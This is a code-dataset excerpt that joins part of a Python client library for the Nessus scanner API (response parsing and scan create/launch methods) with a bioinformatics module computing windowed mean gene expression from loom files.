        None instead of a list.
        """
        info = NessusScanDetailsInfo.from_json(json_dict['info'])
        hosts = {NessusScanHost.from_json(host) for host in lying_exist(json_dict, 'hosts', list)}
        comphosts = {NessusScanHost.from_json(host) for host in lying_exist(json_dict, 'comphosts', list)}
        # `notes` may be missing *or* None — both collapse to an empty list.
        notes = {NessusScanNote.from_json(note) for note in
                 lying_exist_and_type(json_dict, 'notes', list, lambda x: list(), list())}
        # `remediations` stays None when the key is absent.
        remediations = lying_exist(json_dict, 'remediations', NessusScanDetailsRemediations.from_json, None)
        vulnerabilities = {NessusScanVulnerability.from_json(vulnerability) for vulnerability in
                           lying_exist(json_dict, 'vulnerabilities', list)}
        compliance = {NessusScanVulnerability.from_json(vulnerability) for vulnerability in
                      lying_exist(json_dict, 'compliance', list)}
        history = {NessusScanHistory.from_json(history) for history in
                   lying_type(json_dict['history'], list, lambda x: list())}
        filters = {NessusScanFilter.from_json(filtered) for filtered in lying_exist(json_dict, 'filters', list)}
        return NessusScanDetails(info, hosts, comphosts, notes, remediations, vulnerabilities, compliance, history,
                                 filters)
class NessusScanHostDetailsInfo(Object):
    """
    The `info` section of a host-details response.

    lies:
    - `mac-address` not always existing
    - `host-fqdn` not always existing
    """
    def __init__(self, host_start: str, mac_address: str, host_fqdn: str, host_end: str, operating_system: str,
                 host_ip: str) -> None:
        self.host_start = host_start
        self.mac_address = mac_address
        self.host_fqdn = host_fqdn
        self.host_end = host_end
        self.operating_system = operating_system
        self.host_ip = host_ip

    @staticmethod
    def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScanHostDetailsInfo':
        """Parse the `info` object; note the dash-separated wire key names."""
        return NessusScanHostDetailsInfo(
            str(json_dict['host_start']),
            lying_exist(json_dict, 'mac-address', str),
            lying_exist(json_dict, 'host-fqdn', str),
            str(json_dict['host_end']),
            lying_exist(json_dict, 'operating-system', str),
            str(json_dict['host-ip']),
        )
class NessusScanHostCompliance(Object):
    """One compliance finding row of a host-details response."""
    def __init__(self, host_id: int, hostname: str, plugin_id: int, plugin_name: str, plugin_family: str, count: int,
                 severity_index: int, severity: int) -> None:
        self.host_id = host_id
        self.hostname = hostname
        self.plugin_id = plugin_id
        self.plugin_name = plugin_name
        self.plugin_family = plugin_family
        self.count = count
        self.severity_index = severity_index
        self.severity = severity

    @staticmethod
    def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScanHostCompliance':
        """Parse one element of the host `compliance` array."""
        return NessusScanHostCompliance(
            int(json_dict['host_id']),
            str(json_dict['hostname']),
            int(json_dict['plugin_id']),
            str(json_dict['plugin_name']),
            str(json_dict['plugin_family']),
            int(json_dict['count']),
            int(json_dict['severity_index']),
            int(json_dict['severity']),
        )
class NessusScanHostVulnerability(Object):
    """One vulnerability row of a host-details response (compliance row + vuln_index)."""
    def __init__(self, host_id: int, hostname: str, plugin_id: int, plugin_name: str, plugin_family: str, count: int,
                 vuln_index: int, severity_index: int, severity: int) -> None:
        self.host_id = host_id
        self.hostname = hostname
        self.plugin_id = plugin_id
        self.plugin_name = plugin_name
        self.plugin_family = plugin_family
        self.count = count
        self.vuln_index = vuln_index
        self.severity_index = severity_index
        self.severity = severity

    @staticmethod
    def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScanHostVulnerability':
        """Parse one element of the host `vulnerabilities` array."""
        return NessusScanHostVulnerability(
            int(json_dict['host_id']),
            str(json_dict['hostname']),
            int(json_dict['plugin_id']),
            str(json_dict['plugin_name']),
            str(json_dict['plugin_family']),
            int(json_dict['count']),
            int(json_dict['vuln_index']),
            int(json_dict['severity_index']),
            int(json_dict['severity']),
        )
class NessusScanHostDetails(Object):
    """Full host-details response: info plus compliance and vulnerability rows."""
    def __init__(self, info: NessusScanHostDetailsInfo, compliance: Iterable[NessusScanHostCompliance],
                 vulnerabilities: Iterable[NessusScanHostVulnerability]) -> None:
        self.info = info
        self.compliance = compliance
        self.vulnerabilities = vulnerabilities

    @staticmethod
    def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScanHostDetails':
        """Parse a host-details response (GET /scans/{id}/hosts/{host_id})."""
        return NessusScanHostDetails(
            NessusScanHostDetailsInfo.from_json(json_dict['info']),
            {NessusScanHostCompliance.from_json(entry) for entry in json_dict['compliance']},
            {NessusScanHostVulnerability.from_json(entry) for entry in json_dict['vulnerabilities']},
        )
class NessusScanPluginOutputInfoDescriptionAttributesRiskInformation(Object):
    """
    Risk section of a plugin description.

    lies:
    - there is more than simply risk_factor
    - `cvss_base_score`: str (but could be float, we use that)
    - `cvss_score`: str (but could be float, we use that)
    - `cvss_vector`: str
    - `cvss_temporal_score`: str (but could be float, we use that)
    - `cvss_temporal_vector`: str
    """
    def __init__(self, risk_factor: str, cvss_base_score: Optional[float], cvss_score: Optional[float],
                 cvss_vector: Optional[str], cvss_temporal_score: Optional[float],
                 cvss_temporal_vector: Optional[str]) -> None:
        self.risk_factor = risk_factor
        self.cvss_base_score = cvss_base_score
        self.cvss_score = cvss_score
        self.cvss_vector = cvss_vector
        self.cvss_temporal_score = cvss_temporal_score
        self.cvss_temporal_vector = cvss_temporal_vector

    @staticmethod
    def from_json(json_dict: Mapping[str, Union[int, str, bool]]) \
            -> 'NessusScanPluginOutputInfoDescriptionAttributesRiskInformation':
        """Parse the `risk_information` object; every CVSS field is optional."""
        return NessusScanPluginOutputInfoDescriptionAttributesRiskInformation(
            risk_factor=str(json_dict['risk_factor']),
            cvss_base_score=allow_to_exist(json_dict, 'cvss_base_score', float),
            cvss_score=allow_to_exist(json_dict, 'cvss_score', float),
            cvss_vector=allow_to_exist(json_dict, 'cvss_vector', str),
            cvss_temporal_score=allow_to_exist(json_dict, 'cvss_temporal_score', float),
            cvss_temporal_vector=allow_to_exist(json_dict, 'cvss_temporal_vector', str),
        )
class NessusScanPluginOutputInfoDescriptionAttributesPluginInformation(Object):
    """Plugin metadata section of a plugin description."""
    def __init__(self, plugin_id: int, plugin_type: str, plugin_family: str, plugin_modification_date: str) -> None:
        self.plugin_id = plugin_id
        self.plugin_type = plugin_type
        self.plugin_family = plugin_family
        self.plugin_modification_date = plugin_modification_date

    @staticmethod
    def from_json(json_dict: Mapping[str, Union[int, str, bool]]) \
            -> 'NessusScanPluginOutputInfoDescriptionAttributesPluginInformation':
        """Parse the `plugin_information` object."""
        return NessusScanPluginOutputInfoDescriptionAttributesPluginInformation(
            int(json_dict['plugin_id']),
            str(json_dict['plugin_type']),
            str(json_dict['plugin_family']),
            str(json_dict['plugin_modification_date']),
        )
class NessusScanPluginOutputInfoDescriptionAttributesRefInformationRefValues(Object):
    """The `values` member of a reference entry (a set of reference ids)."""
    def __init__(self, value: Iterable[str]) -> None:
        self.value = value  # TODO can be tight by type

    @staticmethod
    def from_json(json_dict: Mapping[str, Union[int, str, bool]]) \
            -> 'NessusScanPluginOutputInfoDescriptionAttributesRefInformationRefValues':
        """Parse the `values` object; each element is coerced to str."""
        return NessusScanPluginOutputInfoDescriptionAttributesRefInformationRefValues(
            {str(entry) for entry in json_dict['value']})
class NessusScanPluginOutputInfoDescriptionAttributesRefInformationRef(Object):
    """One external reference of a plugin (name, values, optional url)."""
    def __init__(self, name: str, values: NessusScanPluginOutputInfoDescriptionAttributesRefInformationRefValues,
                 url: Optional[str]) -> None:
        self.name = name
        self.values = values
        self.url = url

    @staticmethod
    def from_json(json_dict: Mapping[str, Union[int, str, bool]]) \
            -> 'NessusScanPluginOutputInfoDescriptionAttributesRefInformationRef':
        """Parse one element of the `ref` array; `url` is optional."""
        return NessusScanPluginOutputInfoDescriptionAttributesRefInformationRef(
            str(json_dict['name']),  # TODO can be tight by enum?
            NessusScanPluginOutputInfoDescriptionAttributesRefInformationRefValues.from_json(json_dict['values']),
            allow_to_exist(json_dict, 'url', str),
        )
class NessusScanPluginOutputInfoDescriptionAttributesRefInformation(Object):
    """Container for the set of external references of a plugin."""
    def __init__(self, ref: Iterable[NessusScanPluginOutputInfoDescriptionAttributesRefInformationRef]) -> None:
        self.ref = ref

    @staticmethod
    def from_json(json_dict: Mapping[str, Union[int, str, bool]]) \
            -> 'NessusScanPluginOutputInfoDescriptionAttributesRefInformation':
        """Parse the `ref_information` object."""
        return NessusScanPluginOutputInfoDescriptionAttributesRefInformation(
            {NessusScanPluginOutputInfoDescriptionAttributesRefInformationRef.from_json(entry)
             for entry in json_dict['ref']})
class NessusScanPluginOutputInfoDescriptionAttributes(Object):
    """
    Attribute bundle of a plugin description.

    lies:
    - `ref_information` is not documented but is present
    """
    def __init__(self, risk_information: NessusScanPluginOutputInfoDescriptionAttributesRiskInformation,
                 plugin_name: str, plugin_information: NessusScanPluginOutputInfoDescriptionAttributesPluginInformation,
                 solution: Optional[str], fname: str, synopsis: str, description: str,
                 ref_information: Optional[NessusScanPluginOutputInfoDescriptionAttributesRefInformation]) -> None:
        self.risk_information = risk_information
        self.plugin_name = plugin_name
        self.plugin_information = plugin_information
        self.solution = solution
        self.fname = fname
        self.synopsis = synopsis
        self.description = description
        self.ref_information = ref_information

    @staticmethod
    def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScanPluginOutputInfoDescriptionAttributes':
        """Parse the `pluginattributes` object."""
        risk_information = \
            NessusScanPluginOutputInfoDescriptionAttributesRiskInformation.from_json(json_dict['risk_information'])
        plugin_name = str(json_dict['plugin_name'])
        plugin_information = \
            NessusScanPluginOutputInfoDescriptionAttributesPluginInformation.from_json(json_dict['plugin_information'])
        # `solution` may be None and is passed through unconverted either way,
        # so the old `if ... is None` branch was a no-op and has been folded.
        solution = json_dict['solution']
        fname = str(json_dict['fname'])
        synopsis = str(json_dict['synopsis'])
        description = str(json_dict['description'])
        # Undocumented but observed field; None when absent.
        ref_information = allow_to_exist(json_dict, 'ref_information',
                                         NessusScanPluginOutputInfoDescriptionAttributesRefInformation.from_json)
        return NessusScanPluginOutputInfoDescriptionAttributes(risk_information, plugin_name, plugin_information,
                                                               solution, fname, synopsis, description, ref_information)
class NessusScanPluginOutputInfoDescription(Object):
    """The `plugindescription` object of a plugin-output response."""
    def __init__(self, severity: int, pluginname: str,
                 pluginattributes: NessusScanPluginOutputInfoDescriptionAttributes, pluginfamily: str,
                 pluginid: int) -> None:
        self.severity = severity
        self.pluginname = pluginname
        self.pluginattributes = pluginattributes
        self.pluginfamily = pluginfamily
        self.pluginid = pluginid

    @staticmethod
    def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScanPluginOutputInfoDescription':
        """Parse the `plugindescription` object."""
        return NessusScanPluginOutputInfoDescription(
            int(json_dict['severity']),
            str(json_dict['pluginname']),
            NessusScanPluginOutputInfoDescriptionAttributes.from_json(json_dict['pluginattributes']),
            str(json_dict['pluginfamily']),
            int(json_dict['pluginid']),
        )
class Transport(Enum):
    """Transport-layer component of a packed port string (e.g. ``"443 / tcp / www"``)."""
    icmp = 'icmp'
    tcp = 'tcp'
    udp = 'udp'
class Protocol(Enum):
    """Application-layer service name component of a packed port string.

    Values are the exact strings the server emits; some use dashes or
    underscores and therefore differ from their Python member names.
    """
    ajp13 = 'ajp13'
    cifs = 'cifs'
    dns = 'dns'
    irc = 'irc'
    ftp = 'ftp'
    mysql = 'mysql'
    netbios_ns = 'netbios-ns'
    postgresql = 'postgresql'
    rlogin = 'rlogin'
    rmi_registry = 'rmi_registry'
    rpc_portmapper = 'rpc-portmapper'
    rpc_nfs = 'rpc-nfs'
    rpc_nlockmgr = 'rpc-nlockmgr'
    rpc_status = 'rpc-status'
    rpc_mountd = 'rpc-mountd'
    rsh = 'rsh'
    smb = 'smb'
    smtp = 'smtp'
    ssh = 'ssh'
    telnet = 'telnet'
    tftpd = 'tftpd'
    vnc = 'vnc'
    wild_shell = 'wild_shell'
    www = 'www'
    x11 = 'x11'
class NessusScanPluginOutputPort(Object):
    """A port affected by a plugin output, with the hosts seen on it."""
    def __init__(self, number: int, transport: Transport, protocol: Optional[Protocol], hosts: Iterable[str]) -> None:
        self.number = number
        self.transport = transport
        self.protocol = protocol
        self.hosts = hosts

    @staticmethod
    def from_json(port_packed: str, json_list: Iterable[MutableMapping[str, Union[int, str, bool]]]) \
            -> 'NessusScanPluginOutputPort':
        """Parse a packed port key like ``"443 / tcp / www"`` plus its host list.

        The third field may be empty, in which case `protocol` is None.
        """
        fields = port_packed.split(' / ')
        number = int(fields[0])
        transport = Transport(fields[1])
        protocol = Protocol(fields[2]) if fields[2] != '' else None
        hosts = {host['hostname'] for host in json_list}
        return NessusScanPluginOutputPort(number=number, transport=transport, protocol=protocol, hosts=hosts)
class NessusScanPluginOutput(Object):
    """One output entry of a plugin-output response."""
    def __init__(self, plugin_output: str, hosts: str, severity: int, ports) -> None:
        self.plugin_output = plugin_output
        self.hosts = hosts
        self.severity = severity
        self.ports = ports

    @staticmethod
    def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScanPluginOutput':
        """Parse one element of the `outputs` array.

        `ports` on the wire is a mapping from packed port strings to host
        lists; each pair becomes a NessusScanPluginOutputPort.
        """
        return NessusScanPluginOutput(
            str(json_dict['plugin_output']),
            str(json_dict['hosts']),
            int(json_dict['severity']),
            [NessusScanPluginOutputPort.from_json(packed_port, host_list)
             for packed_port, host_list in json_dict['ports'].items()],
        )
class NessusScanPluginOutputInfo(Object):
    """The `info` section of a plugin-output response."""
    def __init__(self, plugindescription: NessusScanPluginOutputInfoDescription) -> None:
        self.plugindescription = plugindescription

    @staticmethod
    def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScanPluginOutputInfo':
        """Parse the `info` object (a single `plugindescription` member)."""
        return NessusScanPluginOutputInfo(
            NessusScanPluginOutputInfoDescription.from_json(json_dict['plugindescription']))
class NessusScanPluginOutputDetails(Object):
    """
    Full plugin-output response.

    lies:
    - `outputs` is typo'ed as `output`
    """
    def __init__(self, info: NessusScanPluginOutputInfo, output: Iterable[NessusScanPluginOutput]) -> None:
        self.info = info
        self.output = output

    @staticmethod
    def from_json(json_dict: MutableMapping[str, Union[int, str, bool]]) -> 'NessusScanPluginOutputDetails':
        """Parse a plugin-output response; keys are consumed with pop()."""
        info = NessusScanPluginOutputInfo.from_json(json_dict.pop('info'))
        outputs = {NessusScanPluginOutput.from_json(entry) for entry in json_dict.pop('outputs')}
        return NessusScanPluginOutputDetails(info, outputs)
class LibNessusScans(LibNessusBase):
    """
    module handling /scans
    """

    # pylint: disable=bad-whitespace

    def create(self, policy: NessusPolicy, name: Optional[str] = None, template: Optional[NessusTemplate] = None,
               default_targets: Iterable[str] = ('localhost',)) -> NessusScanCreated:
        """
        Creates a scan.
        :param policy: policy to use
        :param name: name you want for the scan
        :param template: template will be taken from policy if not given
        :param default_targets: need to have at least an element
        :return: created scan
        """
        # A random UUID name keeps unnamed scans from colliding.
        if name is None:
            name = str(uuid4())
        if template is None:
            template_uuid = policy.template_uuid
        else:
            template_uuid = template.uuid
        json = {
            'uuid': template_uuid,
            'settings': {
                'name': name,
                'policy_id': policy.id,
                'enabled': False,
                'text_targets': ','.join(default_targets),
            },
        }
        ans = self._post('scans', json=json)
        return NessusScanCreated.from_json(ans.json()['scan'])

    def list(self) -> Iterable[NessusScan]:
        """List all scans; the server returns null (not []) when there are none."""
        ans = self._get('scans')
        if ans.json()['scans'] is None:
            return set()
        return {NessusScan.from_json(elem) for elem in ans.json()['scans']}

    def delete(self, scan: NessusScan) -> None:
        """
        Deletes a scan.
        Scans in running, paused or stopping states can not be deleted.
        :param scan: the soon-to-be-deleted
        """
        url = 'scans/{}'.format(scan.id)
        self._delete(url)

    def launch(self, scan: NessusScan, alt_targets: Optional[Iterable[str]] = None) -> str:
        """
        Launches a scan.
        :param scan: the soon-to-be-launch
        :param alt_targets: target to scan, if not given, default to the one set during scan creation
        :return: uuid of the launched scan
        """
        url = 'scans/{scan_id}/launch'.format(scan_id=scan.id)
        # NOTE(review): `x and {...}` sends json=None when alt_targets is None,
        # but an *empty* iterable is also falsy and would be posted as-is —
        # presumably callers never pass an empty list; confirm if that matters.
        json = alt_targets and {'alt_targets': alt_targets}
        ans = self._post(url, json=json)
        return ans.json()['scan_uuid']

    def details(self, scan: NessusScan) -> NessusScanDetails:
        """Fetch the full details of a scan (GET /scans/{id})."""
        url = 'scans/{scan_id}'.format(scan_id=scan.id)
        ans = self._get(url)
        return NessusScanDetails.from_json(ans.json())

    def host_details(self, scan: NessusScan, host: NessusScanHost) -> NessusScanHostDetails:
        """Fetch the details of one host of a scan."""
        url = 'scans/{scan_id}/hosts/{host_id}'.format(scan_id=scan.id, host_id=host.host_id)
        ans = self._get(url)
        return NessusScanHostDetails.from_json(ans.json())

    def plugin_output(self, scan: NessusScan, host: NessusScanHost, plugin_id: int) -> NessusScanPluginOutputDetails:
        """Fetch the output of one plugin for one host of a scan."""
        url = 'scans/{scan_id}/hosts/{host_id}/plugins/{plugin_id}'.format(scan_id=scan.id, host_id=host.host_id,
                                                                           plugin_id=plugin_id)
        ans = self._get(url)
        return NessusScanPluginOutputDetails.from_json(ans.json())
| 41.970464 | 120 | 0.663894 | 4,298 | 39,788 | 5.905537 | 0.085621 | 0.064298 | 0.024703 | 0.022063 | 0.310299 | 0.237452 | 0.196793 | 0.169963 | 0.160586 | 0.158577 | 0 | 0.000462 | 0.238238 | 39,788 | 947 | 121 | 42.014784 | 0.836979 | 0.068111 | 0 | 0.290087 | 0 | 0 | 0.08506 | 0.026309 | 0 | 0 | 0 | 0.002112 | 0 | 1 | 0.091837 | false | 0 | 0.01312 | 0.002915 | 0.287172 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41a06f10c100f3cd38eb1a9e5dbb23f8546f5139 | 10,444 | py | Python | panopticon/wme.py | scyrusm/panopticon | bb28deffb97fd7c983a5abb8c2626c24d9f25e48 | [
"BSD-3-Clause"
] | 3 | 2021-01-14T13:38:32.000Z | 2021-09-07T12:18:48.000Z | panopticon/wme.py | scyrusm/panopticon | bb28deffb97fd7c983a5abb8c2626c24d9f25e48 | [
"BSD-3-Clause"
] | null | null | null | panopticon/wme.py | scyrusm/panopticon | bb28deffb97fd7c983a5abb8c2626c24d9f25e48 | [
"BSD-3-Clause"
] | 2 | 2020-12-22T03:15:27.000Z | 2020-12-22T03:16:50.000Z | """
wme.py
====================================
wme
"""
# second version
import numpy as np
from tqdm import tqdm
import pandas as pd
from scipy import stats
from itertools import islice
from scipy.sparse import coo_matrix, save_npz
from panopticon.utilities import get_valid_gene_info
def get_list_of_gene_windows(genes, window_size=400, window_step=50, release=102, species='homo sapiens'):
    """Partition genes into sliding positional windows along each chromosome.

    Gene coordinates come from `get_valid_gene_info` (which presumably drops
    names it cannot resolve — confirm); genes are sorted by start position
    within each contig, then cut into overlapping windows.

    Parameters
    ----------
    genes : sequence of str
        Gene names to place into windows.
    window_size : int
        Number of genes per window (Default value = 400).
    window_step : int
        Offset, in genes, between consecutive window starts (Default value = 50).
    release : int
        Annotation release passed to `get_valid_gene_info` (Default value = 102).
    species : str
        Species passed to `get_valid_gene_info` (Default value = 'homo sapiens').

    Returns
    -------
    list of list of str
        Each element is one window of `window_size` gene names; a contig with
        fewer than `window_size` genes contributes no windows.
    """
    gene_names, gene_contigs, gene_starts, gene_ends = get_valid_gene_info(genes, release=release, species=species)
    gene_df = pd.DataFrame(gene_names)
    gene_df.columns = ['name']
    gene_df['contig'] = gene_contigs
    gene_df['start'] = gene_starts
    gene_df['end'] = gene_ends
    # Order genes by start coordinate, then group them by chromosome.
    gene_df_groupby = gene_df.set_index('name').sort_values('start').groupby(
        'contig')
    list_of_gene_windows = []
    for chromosome in gene_df['contig'].unique():
        # Slide a window of `window_size` genes by `window_step` along the
        # position-sorted gene list of this chromosome.
        list_of_gene_windows += [
            list(gene_df_groupby.groups[chromosome])[i:(i + window_size)]
            for i in np.arange(
                0,
                len(gene_df_groupby.groups[chromosome]) - window_size +
                1, window_step)
        ]
    return list_of_gene_windows
def robust_mean_windowed_expressions(genes,
                                     list_of_gene_windows,
                                     expression_data,
                                     upper_cut=5,
                                     windsor=False,
                                     tqdm_desc=''):
    """Arithmetic mean of expression over gene windows, robust to outliers.

    For every window, the `upper_cut` highest-expressed genes in each cell are
    either discarded (default) or winsorized (replaced by the highest
    remaining value) before taking the mean.

    Parameters
    ----------
    genes : sequence of str
        Gene names indexing the rows of `expression_data`.
    list_of_gene_windows : sequence of sequences of str
        Gene windows, e.g. from `get_list_of_gene_windows`; every gene must
        appear in `genes`.
    expression_data : np.ndarray
        Genes-by-cells expression matrix.
    upper_cut : int
        Number of top-expression genes per window/cell to drop
        (Default value = 5).
    windsor : bool
        If True, winsorize the top values instead of dropping them
        (Default value = False).
    tqdm_desc : str
        Label for the progress bar (Default value = '').

    Returns
    -------
    np.ndarray
        Windows-by-cells matrix of robust window means.
    """
    gene_to_index = {gene: i for i, gene in enumerate(genes)}
    mean_window_expressions = np.zeros((len(list_of_gene_windows),
                                        expression_data.shape[1]))
    with tqdm(total=len(list_of_gene_windows), desc=tqdm_desc) as pbar:
        for i, window in enumerate(list_of_gene_windows):
            window_expression_indices = np.array(
                [gene_to_index[gene] for gene in window])
            exprs = expression_data[window_expression_indices, :]
            # Vectorized over cells (the previous implementation looped over
            # every cell in Python): sort each column descending, then drop
            # the top `upper_cut` entries.
            truncated = np.sort(exprs, axis=0)[::-1][upper_cut:, :]
            if windsor:
                # Winsorize: the `upper_cut` dropped values are counted as
                # copies of the highest remaining value, i.e.
                # mean = (sum(truncated) + upper_cut * max_remaining) / (len + upper_cut).
                mean_window_expressions[i, :] = (
                    (truncated.sum(axis=0) + upper_cut * truncated[0, :]) /
                    (truncated.shape[0] + upper_cut))
            else:
                mean_window_expressions[i, :] = truncated.mean(axis=0)
            pbar.update(1)
    return mean_window_expressions
def get_windowed_mean_expression(loom,
                                 list_of_gene_windows,
                                 patient_column='Patient_ID',
                                 patient=0,
                                 cell_type_column=None,
                                 cell_type=None,
                                 complexity_column='nGene',
                                 complexity_cutoff=0,
                                 upper_cut=5,
                                 log2=False):
    """Robust windowed mean expression for selected cells of a loom file.

    THIS IS DEPRECATED--S. Markson 4 June 2020

    Parameters
    ----------
    loom :
        Loom connection with a `gene` row attribute and `patient_ID`,
        `complexity`, `cell_type` column attributes.
    list_of_gene_windows :
        Gene windows from `get_list_of_gene_windows`.
    patient_column : str
        Metadata column used to select patients (Default value = 'Patient_ID').
    patient :
        Patient id, or list/tuple of ids; compared as strings (Default value = 0).
    cell_type_column, cell_type :
        When both are given, additionally restrict to cells of that type
        (Default value = None).
    complexity_column : str
        Column used for the complexity cutoff (Default value = 'nGene').
    complexity_cutoff : int
        Keep only cells strictly above this complexity; 0 keeps all
        (Default value = 0).
    upper_cut : int
        Passed to `robust_mean_windowed_expressions` (Default value = 5).
    log2 : bool
        If True, undo a log2(x+1) transform before averaging
        (Default value = False).

    Returns
    -------
    (np.ndarray, pd.DataFrame)
        Windows-by-cells robust mean expression, and the metadata rows of the
        selected cells.
    """
    # Nota bene: patient id gets cast to string below
    genes = loom.ra['gene']
    # This is very inefficient--make a general function for loom copy-over
    metadata = pd.DataFrame(loom.ca['patient_ID'])
    metadata.columns = ['patient_ID']
    metadata['complexity'] = loom.ca['complexity']
    metadata['cell_type'] = loom.ca['cell_type']
    # NOTE(review): the defaults 'Patient_ID' and 'nGene' do not match the
    # columns built above ('patient_ID', 'complexity'); callers must pass
    # matching column names or these lookups raise KeyError.  Kept as-is
    # because changing the defaults would alter the public interface.
    if complexity_cutoff > 0:
        metadata = metadata[metadata[complexity_column] > complexity_cutoff]
    # Normalize `patient` to a list of strings.
    if not isinstance(patient, (tuple, list)):
        patient = [str(patient)]
    else:
        patient = list(patient)
    patient = [str(x) for x in patient]
    if cell_type_column is None and cell_type is None:
        relevant_indices = metadata[(metadata[patient_column].astype(str).isin(patient))].index.values
    else:
        relevant_indices = metadata[(metadata[cell_type_column].astype(str) == str(cell_type))
                                    & (metadata[patient_column].astype(str).isin(patient))].index.values
    if log2:
        # Undo log2(x + 1) so means are taken in linear space.
        relevant_expression_data = 2**loom[:, relevant_indices] - 1
    else:
        relevant_expression_data = loom[:, relevant_indices]
    mean_window_expressions = robust_mean_windowed_expressions(
        genes,
        list_of_gene_windows,
        relevant_expression_data,
        tqdm_desc='Calculating Mean Window Expressions, with "Robustification"',
        upper_cut=upper_cut)
    return mean_window_expressions, metadata.loc[relevant_indices]
def get_ranks(mean_window_expressions):
    """Rank-transform each column (cell) of a windows-by-cells matrix.

    Parameters
    ----------
    mean_window_expressions : np.ndarray
        Array of shape (n_windows, n_cells).

    Returns
    -------
    np.ndarray
        Array of the same shape where each column holds the
        `scipy.stats.rankdata` ranks (1-based, ties averaged) of that cell's
        window means.
    """
    ranks = np.zeros(mean_window_expressions.shape)
    for icell, cell_column in enumerate(mean_window_expressions.T):
        ranks[:, icell] = stats.rankdata(cell_column)
    return ranks
def convert_to_sparse(dense_file, sparse_file=None, genes_not_present=False, genelist_file=None, delimiter='\t'):
    """Convert a dense gene-by-sample text matrix into a scipy COO sparse matrix.

    The dense file is streamed in chunks of 20 rows so the dense form never
    has to be held in memory all at once.

    Parameters
    ----------
    dense_file : str
        Path to a delimited text matrix whose first line is the header.
    sparse_file : str, optional
        If given, the resulting matrix is saved there via `save_npz`
        (Default value = None).
    genes_not_present : bool
        If True, data rows have no leading gene-name column
        (Default value = False).
    genelist_file : str, optional
        If given (and gene names are present), the gene names are written
        there, one per line (Default value = None).
    delimiter : str
        Field delimiter (Default value = '\\t').

    Returns
    -------
    (scipy.sparse.coo_matrix, list of str)
        The sparse matrix and the collected gene names (empty when
        `genes_not_present`).
    """
    N = 20  # rows parsed per chunk
    iterator = 0  # rows consumed so far == row offset of the current chunk
    row = []
    col = []
    data = []
    genes = []
    with open(dense_file, 'r') as infile:
        firstline = islice(infile, 1)
        # NOTE(review): the matrix width below is len(headings); this assumes
        # the header has one field per expression column — confirm for files
        # whose header also contains a leading gene-name field.
        headings = np.genfromtxt(firstline, dtype=None)
        with tqdm(
                unit=' rows completed',
                unit_scale=True,
                unit_divisor=1024,
                desc='Converting dense matrix to sparse: ') as pbar:
            while True:
                gen = islice(infile, N)
                chunk = np.genfromtxt(gen, dtype=str, delimiter=delimiter)
                if genes_not_present:
                    expressions = chunk.astype(float)
                else:
                    # First column is the gene name; the rest are expressions.
                    genes += list(chunk[:, 0])
                    expressions = chunk[:, 1::].astype(float)
                # Record only strictly-positive entries, offset by the rows
                # already consumed from previous chunks.
                x, y = np.where(expressions > 0)
                for i, j in zip(x, y):
                    row.append(i + iterator)
                    col.append(j)
                    data.append(expressions[i, j])
                # A short chunk means EOF was reached.
                if chunk.shape[0] < N:
                    iterator += chunk.shape[0]
                    break
                else:
                    iterator += N
                pbar.update(N)
    expr_mat = coo_matrix((data, (row, col)), shape=(iterator, len(headings)))
    if sparse_file:
        save_npz(sparse_file, expr_mat)
    if genelist_file and not genes_not_present:
        np.savetxt(genelist_file, np.array(genes), delimiter=',', fmt='%s')
    return expr_mat, genes
def get_masked_wme(loom, layername, mask=None, gene_ra='gene', species='homo sapiens', release=102, window_step=50,
                   window_size=50, return_principal_components=None, upper_cut=0, mask_option='load_full'):
    """Windowed mean expression (optionally PCA-reduced) for cells of a loom file.

    Parameters
    ----------
    loom :
        Loom connection.
    layername : str
        Layer to read expression from.
    mask :
        Optional boolean/index mask selecting cells (columns); None keeps all.
    gene_ra : str
        Row attribute holding gene names (Default value = 'gene').
    species, release, window_step, window_size :
        Passed to `get_list_of_gene_windows`.
    return_principal_components : int, optional
        If given, return that many PCA components of the cells-by-windows
        matrix instead of the matrix itself.
    upper_cut : int
        Passed to `robust_mean_windowed_expressions` (Default value = 0).
    mask_option : str
        One of 'load_full' (load the whole layer, then mask in memory — an
        h5py fancy-indexing performance workaround), 'mask_first' (mask while
        reading), or 'scan' (stream the loom file chunk-wise).

    Returns
    -------
    np.ndarray
        Cells-by-windows matrix, or cells-by-components when
        `return_principal_components` is set.
    """
    from panopticon.wme import get_list_of_gene_windows, robust_mean_windowed_expressions
    from tqdm import tqdm
    # BUG FIX: the option check used to live in the `else:` of the masking
    # branch, so `mask_option='scan'` with a mask raised before the scan code
    # below could ever run.  Validate up front instead.
    if mask_option not in ('load_full', 'mask_first', 'scan'):
        raise Exception("mask_option must be one of: load_full, mask_first, scan")
    gene_windows = get_list_of_gene_windows(loom.ra[gene_ra], species=species, window_step=window_step,
                                            window_size=window_size, release=release)
    if mask_option == 'scan':
        # Stream over the file chunk-wise; items=None scans all cells.
        mwe_parts = []
        for (ix, selection, view) in loom.scan(items=mask, axis=1):
            mwe_parts.append(robust_mean_windowed_expressions(view.ra[gene_ra],
                                                              gene_windows,
                                                              view[layername][:, :],
                                                              upper_cut=upper_cut).T)
        mwe = np.vstack(mwe_parts).T
    else:
        if mask is None:
            X = loom[layername][:, :]
        elif mask_option == 'load_full':
            X = loom[layername][:, :][:, mask]
        else:  # 'mask_first'
            X = loom[layername][:, mask]
        mwe = robust_mean_windowed_expressions(loom.ra[gene_ra],
                                               gene_windows,
                                               X,
                                               upper_cut=upper_cut)
    if return_principal_components is not None:
        if type(return_principal_components) != int:
            raise Exception("type of return_principal_components must be None or int")
        from sklearn.decomposition import PCA
        pca = PCA(n_components=return_principal_components)
        return pca.fit_transform(mwe.T)
    else:
        return mwe.T
